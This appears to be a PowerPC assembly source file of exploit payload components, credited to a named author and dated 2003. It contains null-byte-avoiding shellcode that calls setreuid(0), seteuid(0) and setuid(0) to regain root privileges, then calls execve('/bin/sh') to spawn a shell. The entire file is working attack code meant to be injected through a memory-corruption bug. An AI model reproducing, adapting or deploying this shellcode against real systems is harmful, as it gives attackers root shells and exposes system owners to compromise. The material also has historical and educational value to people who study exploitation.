;;;
;;; PowerPC exploit payload components:
;;; setreuid(0), seteuid(0), setuid(0), execve("/bin/sh")
;;;
;;; Dino Dai Zovi <ddz@theta44.org>, 20031221
;;;		
	
.globl _execve_binsh
.text

;;;	
;;; *BSD setreuid(0) code
;;;	
_setreuid_zero:		
	xor	r3, r3, r3
	xor	r4, r4, r4
	li	r0, 126
	.long	0x44ffff02
	
;;;
;;; *BSD seteuid(0) code
;;;	
_seteuid_zero:	
	xor	r3, r3, r3
	li	r0, 183
	.long	0x44ffff02

;;;	
;;; *BSD setuid(0) code
;;;	
_setuid_zero:	
	xor	r3, r3, r3
	li	r0, 23
	.long	0x44ffff02
	
;;;
;;; *BSD/Linux execve('/bin/sh') code
;;;	
_execve_binsh:
	xor	r31, r31, r31
	lis	r30, 0x2f2f
	addi	r30, r30, 0x7368
	lis	r29, 0x2f62
	addi	r29, r29, 0x696e
	stmw	r29, -12(r1)	; -12 is arbitrary null-eliding constant

	addi	r3, r1, -12
	xor	r4, r7, r4
	xor	r5, r5, r5
	li	r30, 30209
	srawi	r0, r30, 9	; r0 = 59
	.long	0x44ffff02	; execve(path, argv, NULL)

	addi	r3, r1, -12
	li	r30, 5633
	srawi	r0, r30, 9
	.long	0x44ffff02